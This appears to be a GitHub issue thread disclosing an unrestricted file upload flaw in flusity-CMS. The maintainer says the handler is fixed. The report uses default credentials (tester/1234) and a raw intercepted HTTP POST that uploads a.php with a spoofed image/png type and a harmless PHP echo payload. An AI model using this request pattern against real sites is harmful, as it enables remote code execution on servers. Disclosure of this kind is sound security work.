flusity
commented
11 months ago Thanks for the note, the handleFileUpload function that works with upload.php has been updated.
2023-10-25, tr, 15:24 光头强不会砍树了 @.***> rašė:
After installation, log in to the backend using the default account password tester/1234 select files [image: image] https://user-images.githubusercontent.com/113713406/278000469-c1be6738-5617-4fac-ac3e-3f2bb77a9cb9.png
select upload_file [image: image] https://user-images.githubusercontent.com/113713406/278001430-8da3e39a-bf14-40dd-a0fe-16e1506f3a91.png
Intercept traffic packets, modify filename to a PHP file name suffix, and change the content to PHP code.
[image: image] https://user-images.githubusercontent.com/113713406/278003089-54b63469-b35a-41a3-8a7f-064c7b6ed9a0.png
POST /core/tools/upload.php HTTP/1.1 Host: xxxxx Content-Length: 164075 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://fluency Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAY81e4VlxYZXQEi User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://fluency/core/tools/files.php Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=k2l9ec3hfjhj2f19d5lml13qal Connection: close
------WebKitFormBoundaryiAY81e4VlxYZXQEi Content-Disposition: form-data; name="uploaded_file"; filename="a.php" Content-Type: image/png
<?php echo "20231025";?> ------WebKitFormBoundaryiAY81e4VlxYZXQEi--
view uploaded files [image: image] https://user-images.githubusercontent.com/113713406/278003363-2a516fe0-335e-4941-8ee2-5761472b78e6.png
execute php code correctly [image: image] https://user-images.githubusercontent.com/113713406/278003566-4fff6d9e-74f1-4181-bf35-2a7513afa23a.png
on line 15 of upload.php:
$allowed_file_types = ['image/png', 'image/jpeg', 'image/gif', 'application/pdf', 'application/msword', 'application/vnd.ms-excel', 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet']; $max_file_size = 5 1024 1024;
$file_id = handleFileUpload($db, $prefix['table_prefix'], $target_dir, $allowed_file_types, $max_file_size);
It is not enough to filter file_types, you need to filter the file name
— Reply to this email directly, view it on GitHub https://github.com/flusity/flusity-CMS/issues/4, or unsubscribe https://github.com/notifications/unsubscribe-auth/AZINVWZQ4AK4Z6DHHFTCFPLYBEAIXAVCNFSM6AAAAAA6PJFQE2VHI2DSMVQWIX3LMV43ASLTON2WKOZRHE3DCMRZHEYTSOI . You are receiving this because you are subscribed to this thread.Message ID: @.***>
-- Pagarbiai,
Darius Jakaitis
After installation, log in to the backend using the default account password tester/1234 select files
select upload_file
Intercept traffic packets, modify filename to a PHP file name suffix, and change the content to PHP code.
view uploaded files
execute php code correctly
on line 15 of upload.php:
It is not enough to filter file_types, you need to filter the file name